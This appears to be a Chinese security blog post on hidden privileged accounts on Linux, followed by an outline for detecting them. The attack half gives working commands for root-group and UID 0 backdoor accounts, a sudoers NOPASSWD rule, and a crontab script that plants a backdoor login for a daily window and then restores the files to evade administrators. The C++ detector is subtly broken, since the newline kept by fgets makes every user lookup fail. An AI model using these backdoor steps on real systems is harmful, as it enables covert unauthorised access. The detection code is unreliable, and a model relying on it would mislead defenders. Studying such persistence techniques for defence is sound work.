Linux Hackers/Suspicious Account Detection

catalog

1. Linux黑客帐号攻击向量
2. Linux可疑帐号检测模型

1. Linux黑客帐号攻击向量

0x1: 将黑客帐号添加到"root"组

1. useradd hacker -p hacker123
2. usermod -a -G root hacker
3. id hacker

0x2: 不使用系统指令添加系统帐号

1. vim /etc/passwd
新增一行: musicyxy:x:0:0::/:/bin/bash

2. vim /etc/shadow
新增一行: musicyxy::13407:0:99999:7:::
//!wq

0x3: 基于crontab进行帐号隐藏

1. 利用crontab(计划任务)进行黑客帐号的隐藏
2. 把用于隐藏黑客帐号的伪造passwd和shadow文件备份到别的地方(例如/tmp/passwd、/tmp/shadow),原目录(/etc/passwd、/etc/shadow)保持不变
3. 将musicyxy:x:0:0::/:/bin/sh和musicyxy::13407:0:99999:7:::两条信息追加到伪造的passwd和shadow文件中
4. 然后在每天的固定时间点将伪造的passwd、shadow文件替换到/etc/目录,并做好原始正常文件的备份,在过了这段时间窗口后,将原始正常文件还原回来
5. 这样我们就可以在伪造文件生效的时间段内登陆系统,在不登陆的时候,伪造文件也会自动还原为正常文件,这样不容易被管理员发现

shell

#!/bin/bash
//每天的11点40分运行cat /etc/passwd > /dev/ttypwd
echo ‘40 11 * * * cat /etc/passwd > /dev/ttypwd‘ >> /etc/door.cron;
echo ‘40 11 * * * cat /etc/shadow > /dev/ttysdw‘ >> /etc/door.cron;
echo ‘41 11 * * * echo "musicyxy:x:0:0::/:/bin/sh" >> /etc/passwd‘ >> /etc/door.cron;
echo ‘41 11 * * * echo "musicyxy::9999:0:99999:7:::" >> /etc/shadow‘ >> /etc/door.cron;
//每天的12点9分回滚原始正常passwd、shadow文件
echo ‘09 12 * * * cat /dev/ttypwd > /etc/passwd‘ >> /etc/door.cron;
echo ‘09 12 * * * cat /dev/ttysdw > /etc/shadow‘ >> /etc/door.cron;
echo ‘10 12 * * * rm -f /dev/ttypwd‘ >> /etc/door.cron;
echo ‘10 12 * * * rm -f /dev/ttysdw‘ >> /etc/door.cron;
service crond restart;
crontab /etc/door.cron;

这样,每天的后门帐号存活时间窗口为11:40~12:09

0x4: 添加UID=0的非root帐号

1. 添加普通用户: useradd hacker -p hacker123
//新创建的用户会在/home下创建一个用户目录hacker

2. 删除用户testuser所在目录
rm -rf /home/hacker

3. 添加权限
vim /etc/passwd
把新加的用户uid和gid改为0:
hacker:x:501:501::/home/hacker:/bin/bash -> hacker:x:0:0::/home/hacker:/bin/bash
or
useradd -u 0 -o -g root -G root -d /home/hacker hacker

0x5: 基于sudo指令隐藏高权限账户

不管sudoers文件在哪儿,sudo都提供了一个编辑该文件的命令: visudo来对该文件进行修改,它会帮你校验文件配置是否正确,如果不正确,在保存退出时就会提示你哪段配置出错的

<user list> <host list> = <operator list> <tag list> <command list>
//hacker ALL=(ALL) NOPASSWD: ALL
1. user list: 用户/组,或者已经设置的用户的别名列表, 用户名直接username,用户组加上%,比如%admin
2. host list: 主机名或别名列表
3. operator list: runas用户,即可以以哪个用户、组的权限来执行
4. tag list: 这个经常用到的是 NOPASSWD: 添加这个参数之后可以不用输入密码
5. command list: 可以执行的命令或列表

黑客攻击手段

1. vim /etc/sudoers
2. 添加一行: hacker ALL=(ALL) NOPASSWD: ALL
3. sudo -u root /mnt/sudodir/cmd,不需要输入密码
4. 这样就能实现hacker用户允许转换成任意用户及执行任意命令

Relevant Link:

http://read.newbooks.com.cn/info/156976.html
http://network810.blog.51cto.com/2212549/1133349
http://jingyan.baidu.com/article/5bbb5a1b5cf43513eba179b5.html
http://www.linux521.com/2009/system/201005/11198.html
http://www.linux521.com/2009/system/201005/11198.html
https://linux.cn/article-2655-1.html
http://chenall.net/post/linux-sudo-config/

2. Linux可疑帐号检测模型

0x1: 检测root用户组的非root用户

1. 通过Bash指令: cut -d: -f1 /etc/passwd,获取当前账户列表
2. 遍历列表,调用getpwnam、getgrgid获取每个账户的pw_name、pw_uid、pw_gid
3. 检测是否存在异常帐号
    1) 非root账户,但是uid为0
    2) 非root账户,但是gid为0
    3) 非root账户,但是shell为/bin/bash、/bin/sh(非/sbin/nologin)

Code Example

#include <iostream>
#include <stdio.h>
#include <stdlib.h>
#include <grp.h>
#include <pwd.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>

void getUserInfo(const char *name)
{
    struct passwd* pw;
        struct group* grp;

        if(name == NULL)
        {
                return;
        }

    pw = (struct passwd*)malloc(sizeof(struct passwd));
    grp = (struct group*)malloc(sizeof(struct group));    

    pw = getpwnam(name);
    if (!pw)
        {
        printf ("Couldn‘t find out about user %s, %d.\n", name, errno);
                return;
        }
        printf ("User login name is %s.\n", pw->pw_name);
        printf ("User uid is %d.\n", (int) (pw->pw_uid));
    printf ("User gid is %d.\n", (int) (pw->pw_gid));
        printf ("User home is directory is %s.\n", pw->pw_dir);
        printf ("User default shell is %s.\n", pw->pw_shell);

    //group info
    grp = getgrgid (pw->pw_gid);
        if(!grp)
        {
        printf ("Couldn‘t find out about group %d.\n", (int)pw->pw_gid);
                return;
    }
    printf ("User default group is %s (%d).\n", grp->gr_name, (int) (pw->pw_gid));

    return;
}

int main()
{
        FILE *fp = popen("cut -d: -f1 /etc/passwd", "r");
        if(fp == NULL)
        {
                return 0;
        }
        char line[1024];
        while(fgets(line, 1024, fp) != NULL)
        {
                //std::cout << line;
                getUserInfo((const char *)line);
        }
        pclose(fp);

        return 0;
}

//g++ healthchcker.cpp -o healthchcker

Relevant Link:

http://blog.csdn.net/xocoder/article/details/8987135
http://pubs.opengroup.org/onlinepubs/009695399/basedefs/pwd.h.html
https://www.mkssoftware.com/docs/man5/struct_group.5.asp
http://www.embedu.org/column/Column185.htm
http://www.cnblogs.com/hnrainll/archive/2011/05/07/2039692.html

0x2: /etc/sudoers异常配置检测

1. 打开/etc/sudoers
2. 递归的处理include的情况
3. 检查是否存在除了"root    ALL=(ALL)     ALL"之外的可疑配置

Copyright (c) 2015 LittleHann All rights reserved

时间: 2024-10-10 17:34:02

Linux Hackers/Suspicious Account Detection的相关文章

SCOM2012R2 (4) MONITOR LINUX

For reprint content of this site, please indicate the source andauthor 为保障原作者权利,如需转载请注明来源及作者 Open SCOM console, goto Administration,right click and select Discovery Wizard Select UNIX/Linux computers Specify the logon account(admin rights) Input the

Chkrootkit Sourcecode Learning

目录 1. Chkrootkit Introduce 2. Source Code Frame 3. chklastlog.c 4. chkwtmp.c 5. ifpromisc.c 6. chkproc.c 7. chkdirs.c 8. check_wtmpx.c 9. strings.c 1. Chkrootkit Introduce chkrootkit是一个Linux系统下的查找检测rootkit后门的工具,需要明白的是,chkrootkit是一款ring3级别的rootkit检测工具

I.MX6 recovery mode hacking

/******************************************************************************** * I.MX6 recovery mode hacking * 说明: * 看一下i.MX6 Recovery模式是怎么工作的. * * 2017-6-12 深圳 龙华樟坑村 曾剑锋 ****************************************************************************

14 Live CDs for Penetration Testing (Pen Test) and Forensic

http://www.ivizsecurity.com/blog/penetration-testing/live-cd-penetration-testing-pen/ Yesterday I was researching for some of the other lesser known live CDs for penetration testing.  While I’m an avid user and a fan of backtrack, someone mentioned t

uboot调试总结(freescale平台为例)

uboot入口 arch/arm/lib/crt0.S #include <config.h> #include <asm-offsets.h> #include <linux/linkage.h> /* * This file handles the target-independent stages of the U-Boot * start-up where a C runtime environment is needed. Its entry point *

Linux System Account SSH Weak Password Detection Automatic By System API

catalog 1. Linux弱口令攻击向量 2. Linux登录验证步骤 3. PAM 4. 弱口令风险基线检查 1. Linux弱口令攻击向量 0x1: SSH密码暴力破解 hydra -l root -P /root/passwdCracker/password.lst -t 16 -vV -e ns 112.124.51.10 ssh 对于Linux系统来说,从外部破解系统密码的途径只有SSH这一条路,攻击者必须借助网络进行密码猜解尝试 0x2: Linux SSH空口令帐号 1. 通

Windows System Account、Linux System Account SSH Weak Password Detection Automatic By System API

catalog 0. 引言 1. windows系统账户弱密码检测 2. windows弱密码检测遇到的问题 3. linux系统账户弱密码检测 0. 引言 windows.linux密码暴力破解.身份认证.密码策略加固的相关知识,请参阅另外两篇文章 http://www.cnblogs.com/LittleHann/p/3662161.html http://www.cnblogs.com/LittleHann/p/4515498.html 今天我们来讨论一下如何在客户端通过系统API实现弱密

Creating a keytab file for the Kerberos service account (using the ktutil command on Linux)

https://docs.tibco.com/pub/spotfire_server/7.13.0/doc/html/TIB_sfire_server_tsas_admin_help/GUID-27726F6E-569C-4704-8433-5CCC0232EC79.html This method of creating a keytab file on Linux uses the ktutil command. Prerequisites Kerberos is installed on

SQLSERVER Account Weak Password Detection Automatic By System API

catalog 1. DB暴力破解方式 2. DB弱密码入侵向量 3. SQLAPI++ 4. C++ ADO 5. C++ ODBC 6. tiodbc - TinyODBC C++ Wrapper for ODBC API 7. 基于API调用的自动化检测 1. DB暴力破解方式 0x1: 利用存储过程 核心思想,就是存储帐号密码的master.dbo.sysxlogins表和密码比较存储过程pwdcompare alter proc p_GetPassword2 @username sys